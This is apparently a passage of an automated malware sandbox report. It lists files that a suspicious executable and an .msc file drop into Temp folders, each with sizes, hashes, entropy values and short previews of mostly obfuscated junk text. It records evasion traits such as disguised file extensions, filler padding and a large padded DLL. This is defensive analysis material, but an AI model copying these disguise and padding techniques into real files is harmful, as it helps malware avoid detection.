                                                            Preview:yrRE1HZhl391H0v198a5rrVLU58T5Ima11ka577E0YxCS3wC900RJ4SWXQc4i31985b91008qAe19y612ywy050..ComboConstants ButtonConstants..Y2Mn5ss695YN141D7UwLG8o50Yn30O3PKmjb8KMd11O15gcBy8378liU18Z1DGI94u9PyRZJ3475B06EP4344T82XF4r18Mp7wOq2584rH0snMtYtB207Fj62eg8t3SH4m2AUfGm9U258..DateTimeConstants BorderConstants..V9MPt1p48z1zq3..UpDownConstants DateTimeConstants..4Qvm49W5pX45QZgZy9T6X0s8zwY0119t7211mW778Z5l41wlYok5l4132ZZ4Ci072127W5m13141q68496p1Hc6GiS76Z5i2W7uAk6..BorderConstants FileConstants..945k347B64Vb115B50k521Gb7T2s9lQtO515F46ZFK5mmX1564n7s7CvUv007f2..ButtonConstants ColorConstants..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\uxesurv.icm

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):504
                                                            Entropy (8bit):5.607034598914599
                                                            Encrypted:false
                                                            SSDEEP:12:UzEzzPUSIuzJEIiD/tV9Z5RWdCJX+Ms5cifEbUKlJ:MvSIuzJJiD/tRzskX+JTf7wJ
                                                            MD5:D49513890FB6627AC0EDBE70EECFADCF
                                                            SHA1:E27A186C75DB61200D77ECFD61DE6DF4915A73AD
                                                            SHA-256:DB5D23C7B678C4AA7EC1EFC31C08276B38B98DD1DFC17F64D6963210368E233B
                                                            SHA-512:4F0A5A8FA20BC9C9C1941EC9FF2BDF65093305DE39283867AED1D8AB58CB4B63F2F9F140EE40A1CD4F455AF8368DF93419B625FCD3353C939A808223A47F091D
                                                            Malicious:false
                                                            Preview:s6b6tXEb9X3TJAsDJ2r34Joy..TreeViewConstants FontConstants..GgU5044t42c0lXW8e5p1z96t7Cyb59280E00y1P923gIix6S307p5LYhL976480565Qx1Q5O9203Q90LUlOl7B04WGq5Rpzn1hB7Xi2pkk739d1MLzJ715bvh3q0tSCl02f1L8ST46TA..UpDownConstants ToolbarConstants..0l1G4Qh5N073l76DW2990C43eosFAAT3w4497r6utWpR733D..FileConstants StructureConstants..H8s73W8K9X0Bp30M8vq60x8k1z528Y78H6w4Z22LT5shJJ2ZH709h41VPr87Yeh87St27gM7Lc8654c9O2ngO25a25mJ66Nv63lxb9d7HK8ru5QB6Xc1271G0vG96nywBwJdh50dw66KjLK2w34634P60..ComboConstants FontConstants..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\vgusrmv.3gp

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):593
                                                            Entropy (8bit):5.554946572919045
                                                            Encrypted:false
                                                            SSDEEP:12:C1pjQ0FcuSRjhZIcQiaEKk42KQORto7XbWPWM3xLmv:68+0dYGf4lpRto78WaKv
                                                            MD5:CD8691BCAA6705A65F08C872A0AE7BC5
                                                            SHA1:5E27EA4FC964E45D202023F8FC936CC6BA3F8A16
                                                            SHA-256:27C93A8E6BAB6487A5AC8AB450FCDE1725387B5C64B324388D6C773AB669FB46
                                                            SHA-512:F7C9F29E7D474370F458587A00BEAAFB3AAE8A3B84D5912D90C2CC0CBEBDED0C822C1FC2C996EAA94D5CFD906E3E0213F18FA6F7E80FD4F90ED001DD2947BFFA
                                                            Malicious:false
                                                            Preview:01VQwM7xt648M7u3042836G6u2T49906n76fV387412jxzz9hc5743483U69117e8Z722..ButtonConstants FileConstants..94966G9TOzGS6ebo42gyHD63He90uu65uM6s5540267589239496WM07AdI666t6v2Gk875Gu3dXzx68e27O4XR37em46qe3c7Iu76ckS5N71Y4qz46fYr95rMXg8XnkgD301G71M..UpDownConstants ToolTipConstants..tR4Zxd06x9Pp76Z913dan53622t3YtsB0eGC6ZeZ2vT35RrK0ZA3qpeU6296j8054CF7w678xSYp035F0nd59f01n57ZN4L73175Q5519k4821dTaSUxe0A0R8R4JksVEcYFB540459207C6O43WJF39j3..StructureConstants ColorConstants..6NB0UQ4bv2Vn07i6u41973XJD3w71hu9u10J6HHc03zu6DE5g31251uZ3qv8h86Ui9hT81V6auT6U25T01R532WJ..GuiDateTimePicker GuiDateTimePicker..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\vmcsd.xl

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):539
                                                            Entropy (8bit):5.599725191775324
                                                            Encrypted:false
                                                            SSDEEP:12:H1jqJ8dWGxex174ecKfDjWgPAteL5pHWCM4wexH9lFPqv:H1+J8UG617yKf3WgkeLLZMGjlYv
                                                            MD5:AF0541E9FAE855E7A52E80C9E0405F98
                                                            SHA1:6F7856575250142D114ACA995A9652990C1E0078
                                                            SHA-256:0CBA71E467A718727C02FFC94934340EE623B1504CEABC4FB6D317D2A7AD5F58
                                                            SHA-512:C0CA701BEEC8CD1202C4B006095082C2DDD4EA1EA4F2DC50E9D23F1A18C6AC35C217DC895CBBF5690855F94134AD0143D44D69A36C63228422ECF176BA06FDA5
                                                            Malicious:false
                                                            Preview:p36H6SjF1562QK56348s32gcNz517N5662lv8pdm4r0eAz8fX4r7m2..FontConstants FileConstants..2q1cqu0404NIS9VG8Mjh61D038cdWjhG4w9A5arv4083a2Sl2ZvCi21450k7T1rY4M3695u17x75p78knj1A3551k062y15n0HQ81674XVm278BHqV9BB4..FileConstants ToolTipConstants..8069WkM442S98Ck6X8qEy04FZ559vzE55a622039qW53V3PzpL955..GuiDateTimePicker BorderConstants..6J9p1n1d3W41i957604290382V80Z8d5srf5S9z60zxOC69D2SE23f1xHic64d9uj3tN43atG16aua5en37GmNVB91Ho47EqXr6C2ChWv6F2565oFp2d38N0n6p7P89TKr23C86U2A2T6M0W7qRonO5741bIXaSbkJ65Ro9q071v8..TreeViewConstants GuiDateTimePicker..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\wluqdc.msc

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):587
                                                            Entropy (8bit):5.52732025652089
                                                            Encrypted:false
                                                            SSDEEP:12:aPfXoJTHK5bH2O6265mFeHyN5oV66dRdN0Q5yuXhQX6:aPfXUHOT2j5mCbLXv0MnRf
                                                            MD5:7AFA77936136795EEE474D1427C6860B
                                                            SHA1:F3DD2C335A2A1556EC7E0C4B1A84B879D7871A61
                                                            SHA-256:F2C9099CD19481ADCDF5ACCD3141031DEA2069F4AB946F82E48324390BB7212B
                                                            SHA-512:838A510F9D5D749972277FA36B5F88F4BB2D3A3EFC40004878116D396E0E73CA3A7A3BAC5A086E8AB16BFCEA8FE40B280456CD7B45B09046EE754951B85E9B7B
                                                            Malicious:false
                                                            Preview:z5E82EiiIn4Yt18i7Tiim73D520Mpj99Evsi23x2d3lPtAysi12Y1u7tiw..BorderConstants ToolbarConstants..33q1N513L71427ZT8263TVkkE..StructureConstants ToolbarConstants..9B431z07D8Po264MBdr2oW9ae05oNiv4213K1E3BJh7GPE8WC225227k757d0181d01u3C6i07igd0rGwr8J93Q5j08S21382ol6QtF630X7k90repT9Z14Rt8Md4P..ToolTipConstants FontConstants..7A4y643yf5QC92oL71xa1uN89Wz33011Yj..ButtonConstants StructureConstants..3y8YAG940NwH1ug4idIE9krI8t9U9bN617z7mGoL1K2V7ml35g9..ToolTipConstants GuiDateTimePicker..63428ZGBf9AXr1WjTvh953tIS5QKkGNTP5erclxJ7xc960515C1757g85x6tNg64VzD2063a6..BorderConstants UpDownConstants..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\wqxfi.icm

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):604
                                                            Entropy (8bit):5.630742912178927
                                                            Encrypted:false
                                                            SSDEEP:12:giOiIMLFEZOJDMmmCxVrZufKPD5ViQ6QnY9iqP2R:NOfM9JiCxdZdusYGR
                                                            MD5:A7D646B218E8D14309054A445F055721
                                                            SHA1:A9B352E14544F39E52ED37CAE95C133DDE10A166
                                                            SHA-256:4361A6ED7BF9F6ADFEDCD6C211FC5C0759BC0564653E372BC127881974466934
                                                            SHA-512:327C01AE6CDF9844E45ADBFCEBA2B3E3473C1C7F963992B781956FA9F3DE96E19D6570F6AA928CB208732214D339655A8015A19C57D1274723F66C32F56CCB04
                                                            Malicious:false
                                                            Preview:fiPeEIy73Y85..BorderConstants ComboConstants..3931241g3n2m91W539vsJTVwdKfCFt973250V7t3R6SF25u081N938MK56zrya45o6UI94I3043yX6CX88I0F9jV9173zMh0Q9wR835e493H9K47vyX35bBr7..BorderConstants ButtonConstants..76197BO29bpi34bq468HLF86NlMR4g1dLp70h39cAbt38K6z321m9vzWy1x8fvBE7D8z45..GuiDateTimePicker GuiDateTimePicker..D9Ii70c45twVbmF4Ser7wYtbdBe12899ZFZw6i1R3Zu8Yqu078D5R9Y15dfN72p3Oy94P1b2177181O88G10vV94q3vS42C0xS5x76H63xvh76W68280R87l3I19B641vW7h7RWU3871h5615ZR48EyRei..GuiDateTimePicker FontConstants..w4z10485N3Y4gXI0a599f35R30Ap5u46IN96N10G171228d98H332ujaXsD3j9551U..TreeViewConstants ToolbarConstants..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\xlrmhegdb.mp3

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):603
                                                            Entropy (8bit):5.6339556731673985
                                                            Encrypted:false
                                                            SSDEEP:12:ke35nmSIR4ZnJeL1yPDhqlWgDHpIibhhv1Re9:ke35mRR4d0L1yPDhWrhd7W
                                                            MD5:E567673511B0E87E9582F248BEBB9132
                                                            SHA1:2DE90139ABE461A9C9CFD885A2FB660EE24224AF
                                                            SHA-256:56EB9CD2AAD3A869A79E63B8867C01364B091892AD984F2C31C8F2426656881B
                                                            SHA-512:366EC7F1DA50C20CCAFA58C967724DF9F57635AB69FB2E5F67F430EACDEDCF67668B7B957DC46C2CF42E6890DE90F80C2EE46656795C90F16DCD4AEE9627023C
                                                            Malicious:false
                                                            Preview:28f6F1j260yp2..GuiDateTimePicker UpDownConstants..DZ146vE8of5Ksk34P7Za5vgSZ0x7aHraa53rs0LwqDzlyAd6ZUhp9uCHx349VYO4n881o91CbDmg6WPC339P20M5O41..FileConstants ComboConstants..8481486m1TM7G0p3h3ScH588GM7Omo6J3444n901cywLe4..DateTimeConstants DateTimeConstants..57lNxaQE9RcW09rU0E44gS0AYE20H9BzsV59fd4N179ekYn3z6L4Qyu5S5088nBWKInCA9xMDh7..ComboConstants ButtonConstants..m2WC817As0fO7ph957p344S52gGPF0..GuiDateTimePicker StructureConstants..132S2238746DkWcN4Fe7Fb53QDtDbvpEyp1r5Mm5c49o9bu5I2V04DRJpE35J1y7Et0k17t1MFd6Az57t18Q5069qQ6u94y1Tb754STR2wbU3CG5v74uNho8aF2ET92B646lx7..FileConstants ComboConstants..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\bhhd.exe

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):558
                                                            Entropy (8bit):5.4249857641377375
                                                            Encrypted:false
                                                            SSDEEP:12:zQkwgVKGFrBPVRHcgfNBuJMaBPw+2xP7J:skwRGFrV8gVDaq+2xjJ
                                                            MD5:5E972946E66C873892B9DBC7627F43DA
                                                            SHA1:531AA209BEC0E92CAA45C1716009F92FDEC216E8
                                                            SHA-256:4E6AB4AF4097CDCBA0A9668830ADAB6D2F0E887F3E4A6D6C5D1E4208B8F1CD24
                                                            SHA-512:BA9B207D3CA6EEA7CF5DD80D1789FB50B26525AD7825768BD0C8E02A1F1FE9E0FBFB76BBAEE3F03C90C4CC96D66321AFE80DC0C24CA3ABC21D5A26C42BE1C9B9
                                                            Malicious:false
                                                            Preview:T49UAt23lz8879J2c1j9lx..UpDownConstants ComboConstants..5991J97j84I6HHd89JQ8AM9596MK9Ksf6Lo6d3s2068f9..ToolTipConstants ComboConstants..48EK7K17goP5ho12J52kdM13977Zq5N57SVMZ094PZTy33w704kvon81jqflw8g54uK5j2tKRHwGbg1QV57..StructureConstants TreeViewConstants..5at4alj54x5p..ComboConstants StructureConstants..51hM4FU2EU04230Q7lUc92pQw09QY80f4P9mN8929I2YSV8613a5ugetqgE356T57j1601e0232cfi5..DateTimeConstants FileConstants..200l42S40..ToolbarConstants TreeViewConstants..EVYU7941n878P31s7U1148D7E0923tv57Lzn1qCJtu77Fk3h97jW2Dqyo..ColorConstants FontConstants..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\dwbs.ppt

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):567
                                                            Entropy (8bit):5.56094256591372
                                                            Encrypted:false
                                                            SSDEEP:12:kXLFRBnBAu8DuiBNJHF1VlgtfTeQGsRrKKHglCvwbiPyi:UBnBcDdBNJHFqUKRGaKTbi3
                                                            MD5:08CFF3453C8ECDCAFACB5F99FF833910
                                                            SHA1:BDE46DD6D3F60241171346300AEAD24D1FBB60A8
                                                            SHA-256:8D52C2CDA979BA14CD244D5FAB615F283821B6F86C34B998D82166F0FD41521D
                                                            SHA-512:6076BE5D7B848D13CAE7B39D82D59AA137971F2438B82B85B67C119C57BA100C469B5A54B7BE4C19803BCEDC236C6D79A163A2E78BEFF78AB3C0911D8886A4E5
                                                            Malicious:false
                                                            Preview:dj40yWTkLz8gD0aE32t54cm7nbXv08WG689I6654LM24834zH42fAJzryjZr468ejo08823P9c0v8L4373072M4Pi4rM8P44L0q4h56L494M78tIn6K396ss7d1wfd719FEaQ53t2i1G6l823M9X46k058L53P5..StructureConstants UpDownConstants..N0jR3vG6Qy03m57549wztX29v8cF08H9590N42Nn4xRXxqNQh6S9169gr1364n6Bk036958IJz4lt05qW3dij1Q7KCM6JU2yK33f3Yi707H458uJc45TMFFYI66R3T20gAnT..FontConstants ComboConstants..4NJM2Qy7s5lt3Wo6025V39q7qaX51h63i0g3O3wy154c764Y9i81Vw36D69536V9EQ5gb0E1J0UHot36Dqxz0w200N8hWe03818rV5607v846w2bO9uZ02VeS24QdsEXn875t7MHO0315282XE147CvKR37090215390qcM0E2Blz..ComboConstants ComboConstants..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\gicjkqugui.docx

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):36673
                                                            Entropy (8bit):5.594573464180928
                                                            Encrypted:false
                                                            SSDEEP:768:4x6JUE3SMIoX7l10mWIkTeb7TBZb7bFZ9lcjWTMKvzkwVLMXmBGRV0h4S:4xOSzoX7BxkTI7TBxxlCWT2ALM2opS
                                                            MD5:DC4380A1A59A937CE03D955B430E9948
                                                            SHA1:AF1B043D785071D380B4129D6C18836AF858F216
                                                            SHA-256:89B5DC18DE51C0DE35B888B9FE2E8D6995917F7AFF56C6ACF1BB3185CB63BE9E
                                                            SHA-512:39A40D4A51F0C930DE35B664BEF1FC438D76F2EA1CBBF19E5A1FC718EE0B80CE9098377B9FEF8FF8ABC254B54C0711F79142B230DC18E9116BDFD995623B4AD5
                                                            Malicious:false
                                                            Preview:88M1ak5g6X4Wpk..3Inr3h1UuKjOPn0Z7wf6COg240sG536nS56Y0960L574r3x90u8328wRXC28688..4591Bui610yG7qa6y8W61V14qMc89C78h5580PyBf92e3..9z103T41U84872S62M768h3m645V8iLZ0Q77rx45rPsrPq6LnHnCI6k0kCJ..7c6o0f3n3423OuGRc1QPG58378qNHeDpq11IdT0b0VXY713I2C2IELtA3339xfw96I9J97ebP82q3..096oXVPYC188WS68XnM3T8X8P06w2I908Jrwx7Ro6xG7in370kI85YVq00H7177s11u4op3MN..TQqw26ae7n2f98i7709337h3RO8WTJ636sgu5QN03OBTiW5RA5l40Os56N0b..wT6628IJ1O00J1E36ttL8R9ek6k8Z07340nJCY02v07a9vc45i2oi..F4dn1cMAxi54xyl5e346A4284N2L56Ewb418026Oc0C579X85ORnO193tZ9pGo..6ew46AzpJ788VE7t6u1ab5u7XsGAUBFMjt846nZ37RQdE0AzwS9n66ZjB80062B0K9P66mJJS5Z66JBgRLcdMBQ10..F5o725KqV26Cq23988Glv1I668mpS73252N7Dd4D3012094aT0g5828a39IGQ9W9ET3YpQ5oJ986750g0..W993DG3349S4ln00m3yv3h575824p5Vs8517uitTf1hR8gDkoPHT3..55h03o8TM1b0965T6g2XB5ZGxM6U..0YC4mBU7JQ383mt3bHG9qih18U11133Oa439338y4U820mljq8Pd4u21..74204rz7pu2583mr173vHki684qqDl906Rvy976TRls2cQ7s3B8rP..3q3ON2GZ60BCZxL9K48886h9455Js09vT9CjN095AF..YB3j046mN988T77L8T4X8Y7w47u0B75knO0U0B38x3l3GkLQkbou9qK8j3Bc

                                                            C:\Users\user\AppData\Local\Temp\dsvk\hjca.vbe

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (406), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):84984
                                                            Entropy (8bit):2.9903521299108915
                                                            Encrypted:false
                                                            SSDEEP:24:QRP5P5P5P5P5P5P5P5P5P5P5P5P5P5P5PA0YeeeeeeeeeeeeeeeeeeeeeaYSSSSa:IHiW6WDhWC6lnIhnrQ
                                                            MD5:AE7483D6C77F985615D1A9773CF32FA4
                                                            SHA1:DF4224A3D4254710A23540C67508EE2E855311AD
                                                            SHA-256:BF37F552799B94662EC2D476D1DE56CD5DF26A74AF0303B47631C4E9EF28DC63
                                                            SHA-512:37F33701B9775824E9387DA02460E743BD166C681C16F50250253D3DFB9039D16125BCFCD14C795575512192DDF639080568577111DFDB1B46AE21CD9BEE1EEA
                                                            Malicious:false
                                                            Preview:..T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.....T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.....T.e.l.e.V.r.a.m.(.4.4.).:.T.e.l.e.V.r.a.m.(.4.

                                                            C:\Users\user\AppData\Local\Temp\dsvk\jxfpvfxwoe.3gp

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):645
                                                            Entropy (8bit):5.557586766694295
                                                            Encrypted:false
                                                            SSDEEP:12:jpm92LT7ZCy1K8BPU8RLZjdahra+gLMgo6iwlhh2pW60D3gLCOGLv6bICL:QuZy8/LZjdasno6ip70DMTGr6bHL
                                                            MD5:10E739785CD454F2A477C9FEC9FE4A93
                                                            SHA1:88436B1606ECD432A9CBBB226A497F3F69E200B6
                                                            SHA-256:ABCEFD6184280165128C23B72ED46AA34C2E77E956AFA7EF2B2CE748FBAFA565
                                                            SHA-512:7B60546D5AA028AB8EDD2D6EBDEF6F3EC25D0ECBBD623ADC2CFC791CED54E27E081DF3E738135D278240B71FDE45353E3FCB8618823E16B0C67AF55BB35146D1
                                                            Malicious:false
                                                            Preview:4ma268jx5pe0Np1O4j8F5b8F610ECe9jg04p0I6Ms63J7qlj6Q3Re8Sw..DateTimeConstants FontConstants..9GIYgs8ms8HckR04eyO1e332wdd5..FontConstants TreeViewConstants..N4677x6it9bgevv36s742bCI94PIIn7PcXX168F6FT575616Z11zH95Rn38XI16x7060LWPzm8qxxt774X6K24I58S9hng3O7A8..DateTimeConstants ComboConstants..6dI07O30n27Z44L5Bni6Sc8t25H8c1s1PRI92j0DjBWM7U4309A33NA8xh8g1iDo21064G6qo40340DcYC494Lp5T73d12Fo077LD6F1yC8S5y1k5BW90..DateTimeConstants GuiDateTimePicker..HyJIwy..BorderConstants UpDownConstants..v7H0o3D71AX707671666D7667u32el54e3A66g0lHchd0q7iCRzr80S4916E2Jv685863U2wx1ZqG816w70ySEG9s7UY62K757vo84283uWTkX4Gc26yP8SH7..StructureConstants ButtonConstants..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\mhauxsgjt.ppt

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):569
                                                            Entropy (8bit):5.546164799845927
                                                            Encrypted:false
                                                            SSDEEP:6:yPLxTS4m/mxNlRwBkQRfLobhJhEWpjRIlM/IGWKd0QRI5LWiE6r4jVdKe5LWYzwU:6xTFqBhJEbhDKkb+ER6UWeTwLTDDbE1
                                                            MD5:5C2105F29D585C991E34474F76511B8B
                                                            SHA1:B8F45DDB8B66554FFF166823B3839A6754A203F1
                                                            SHA-256:E24AC134DC8B26B8036B0CD4671E4FC722E3391D5D72B897070398ED0D377353
                                                            SHA-512:854187C18AC225D61EAB217763B822D839A0082CCE5482385D9D1EED9E18F44C93CA098ACCF1C8BE8457F24DBD34F1E2FE4A354B6C8BE88559037C406DCAAD7A
                                                            Malicious:false
                                                            Preview:SM5D2N7T369p69jne3p6tH6JMCG8F1..ButtonConstants ButtonConstants..2R9W446J4613LLY6tli151Vm18qVM5BZ40Hv28M4l48C19t7b4TZlH0675jY89Q40x42Q7H8Fvgt7E9F802fOWhOi32h0R8354w13Q5r750HJY31K97HT43R984DaKRM4o2uR2Z1cVg5842HECr98G9FjmF14o0323M2l4cy4..ButtonConstants DateTimeConstants..X073683u29EW9n5J6AMJaB1DJ67x3Lv122164F3vQ8nG1n166q589T08CD6jK87l59OM55CFhnNJOx1..ToolbarConstants DateTimeConstants..WHkj91w1U6V747Ra4815Jv1o0K190L107wOau5f58q24Sa6250Yl2yn6TWs9p7V6HRK9k28K1699C7901392Q7brLd966ubRYC5w7XXtC4274O6h5ucp312c558m90r3lE3TCa541lJX5nXbbQ..GuiDateTimePicker FileConstants..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\mldq.txt

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):574
                                                            Entropy (8bit):5.506003077562106
                                                            Encrypted:false
                                                            SSDEEP:12:8XeVpRuKqetRNY9UW4DcMld6L/JQdcj0hwExqh7qkk9jhh:8apRunsNY9zwbld6LXujkWD9h
                                                            MD5:350AD61843075D982363E7DA5685789E
                                                            SHA1:1E3649C8683F73AE16F704C29E46D71FA2D3725C
                                                            SHA-256:B6C17B3F5AA47450425E920AB286E5CF5E3988271F977AE1BA969A872B9BB665
                                                            SHA-512:BEDB2CB274C7400EF8B6A39C9C5D5DB159C1CF02640F145DAA69600121A9D5A617D5BEDA4D9A6F245A33AA4C4AD3EC06C06778CAF864C06DF656BBEB81138C2E
                                                            Malicious:false
                                                            Preview:614U7iN7ZKHLl00060c35S704NfelQ056Yl50oB4QL406BuwKks1E991x0a98p8zhgLS2PwTw7Urz1qX75ENyeo5r31..StructureConstants ColorConstants..325b7L4hq467y90eM9E3T9iSh45Y689b083w85l1MV3a2k6TC4L7002qUv63Q34L904U45D99n0udbX3p7k088F..ButtonConstants ButtonConstants..109X69g8795it4ZCoBJTI63ioBh7999n25K9F9Rq9e6k77847XxBkV7qPHge2V2T78UzX..DateTimeConstants FileConstants..dK3206T1..FileConstants ToolTipConstants..c5Uaas4A3l5P50bVi39xR974uf9di1..ButtonConstants ComboConstants..Mz2E111x02Lb92LXs3D6Sos3zR2745W00F06zLv8759xr9ZL4j1IEL44I9834igo7G164Kyfk2RMRA..StructureConstants FileConstants..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\nhhjmppg.dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):115071724
                                                            Entropy (8bit):7.040365181374398
                                                            Encrypted:false
                                                            SSDEEP:98304:FNTNKNeNUNAN+NTNmNFNbNmN2NYNmNpNXNbNCNINVN8NeNNNBNPNLNCNjNINJNDt:B
                                                            MD5:E15FB1F8600E5EEDE00A8CA7FF8012D1
                                                            SHA1:53EA558E9EA5F975CE0D0E379BA4D2A8D9CB4968
                                                            SHA-256:4BE158BB86B94202C4DF7FB5F57EE8D3D229CB2D64E7CF764A0F2A488D517082
                                                            SHA-512:34788AA4D0BCE701C3A0DCF75C90E3DC221A7ABDF3720AF828874233A24DEB5697434E331AA43D21788EE96A9B802F1E76610FFBA2F72EF523B053C46E62FF95
                                                            Malicious:false
                                                            Preview:..;.F..F@.j*1.....Q#z...G".....!yB...y..!\....{(.)K.K.3Zk.......sp/...9.V...H..,h..J..W.....\./............r.!5....x.yI....O..........#.c.s......U.....\HgVE..R.u.2....>V.....y6.]..W..!O.a......g.|.DN?@....p..:N..K..cz....Wk?..L.....P.-.yj........x=u......7.{.R.Di.!w.8.u..G9(.t.#dKT.U...(....}.<..;$.@..6Uq.....b...:._Fh'.....P.#.|F.wt.2*.'N.....B....W..H....@U.a....6.9.l.P.1.6.y.2.H.Q.L.0.Z.Y.5.Q.9.1.0.3.8.y.j.1.s.1.Y.9.1.4.u.0.S.5.7.V.1.1.7.S.q.2.2.0.....z..E...0.d.E.n..F@.P..&..&5...S..YM..}+.y.`...H*...q...."...}1Q..7./..F37.C.dSK..uWQ..t.(./&_o....:.4...Z>....5.3.3.i.A.6.d.1.0.3.4.z.Y.5.1.p.1.8.D.4.r.J.g.8.0.Y.F.1.6.9.2.v.b......)j.D.;M<?bE-..<.8R......{......=7py>.>.2...e....,.L.\...X....=..b..^.X........Q.....{vI^.]g[..O5..0U./....#=,9..Wz.5..L......qe.S."....S...4w.>_.A#m.b.7.r.......{..p..G+.z.[.-J:...#.U..Y..k..N&0.LQ.#..p.t._."1.0.i..~..E...2..B2h.q4..W.K.R......,....1.F.8.V.I.5.X.H.8.4.D.I.X.4.9.j.1.Q.X.5.c.d.....S..t.c6.{....d\0...!.F.pN..-

                                                            C:\Users\user\AppData\Local\Temp\dsvk\nmktnvu.txt

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):558
                                                            Entropy (8bit):5.54174792855503
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:50E0655BD2AD0316466463E9BA2BFB7A
                                                            SHA1:9EFCC43BAB881C5ED0C25DCB5B71C8F77B017B77
                                                            SHA-256:DC284BA52997D1F413830AAA7DADC69C36D9E7F80C0EBA5B51A533359F13D88C
                                                            SHA-512:642385885F4391D4830E16E0DD1F1B90BE07879105023D968613A7499D131AE1AEF927434D4677B2CC15159F0EDFCE6C6D4661A0DB3106A266F1B7A01F90985F
                                                            Malicious:false
